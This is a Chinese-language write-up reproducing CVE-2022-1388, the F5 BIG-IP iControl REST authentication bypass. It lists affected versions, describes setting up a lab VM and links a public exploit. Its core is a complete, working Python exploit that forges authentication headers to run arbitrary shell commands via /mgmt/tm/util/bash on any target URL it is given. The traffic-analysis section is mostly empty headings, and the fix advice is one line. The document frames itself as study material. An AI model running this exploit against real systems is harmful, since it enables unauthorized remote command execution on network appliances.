CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现

目录

0x01 声明：

0x02 简介：

0x03 漏洞概述：

0x04 影响版本：

0x05 环境搭建：

下载环境：（要注册账号）

登录页面：

0x06 漏洞复现：

EXP地址：

修改EXP:

利用EXP：

0x07 流量分析：

说明：

特征一：(看到这个特征我就想起来CVE-2021-22986这个漏洞。)

特征二：

特征三： 

0x08 修复建议：

---

0x01 声明：

        仅供学习参考使用，请勿用作违法用途，否则后果自负。

0x02 简介：

        F5Networks(纳斯达克: FFIV)，全球领先的应用交付网络（ADN）领域的厂商，创建于1996年，总部位于美国西雅图市，F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用，通过交付云与安全解决方案，F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构 。        

0x03 漏洞概述：

        F5官网发布安全公告，披露F5 BIG-IP存在一处远程代码执行漏洞（CVE-2022-1388）。漏洞存在于iControl REST组件中，该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST API 接口进行网络访问，进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。

0x04 影响版本：

        BIG-IP 16.x: 16.1.0 - 16.1.2
        BIG-IP 15.x: 15.1.0 - 15.1.5
        BIG-IP 14.x: 14.1.0 - 14.1.4
        BIG-IP 13.x: 13.1.0 - 13.1.4
        BIG-IP 12.x: 12.1.0 - 12.1.6
        BIG-IP 11.x: 11.6.1 - 11.6.5

0x05 环境搭建：

        下载环境：（要注册账号）

         F5 - Login 选择存在漏洞版本。 

 选择OVA格式下载后直接导入VMware Workstation

        登录页面：

0x06 漏洞复现：

        EXP地址：

GitHub - bytecaps/CVE-2022-1388-EXP: CVE-2022-1388 F5 BIG-IP RCE 批量检测

        修改EXP:

import requests
import json
import ssl
import urllib3

urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings()


def attack(target_url, cmd):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'Connection': 'Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host',
        'X-F5-Auth-Token': 'a',
        'Authorization': 'Basic YWRtaW46'
    }

    attack_url = target_url + '/mgmt/tm/util/bash'

    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}

    try:
        response = requests.post(url=attack_url, json=data, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] 目标 {} 存在漏洞".format(target_url))
            print('[+] 响应为:{0}'.format(display))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {0}'.format(target_url))


if __name__ == '__main__':
    target_url = input("请输入URL：")
    cmd = input("请输入执行的命令：")
    attack(target_url, cmd)
    print(target_url, cmd)

         利用EXP：

0x07 流量分析：

        说明：

        由于抓到的流量都是TLS加密的流量，研究了很多天都没办法解密，所以只能分析EXP了，从EXP中不难发现有三个特征。

        特征一：(看到这个特征我就想起来CVE-2021-22986这个漏洞。)

        特征二：

        特征三： 

0x08 修复建议：

        当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。

        链接：https://downloads.f5.com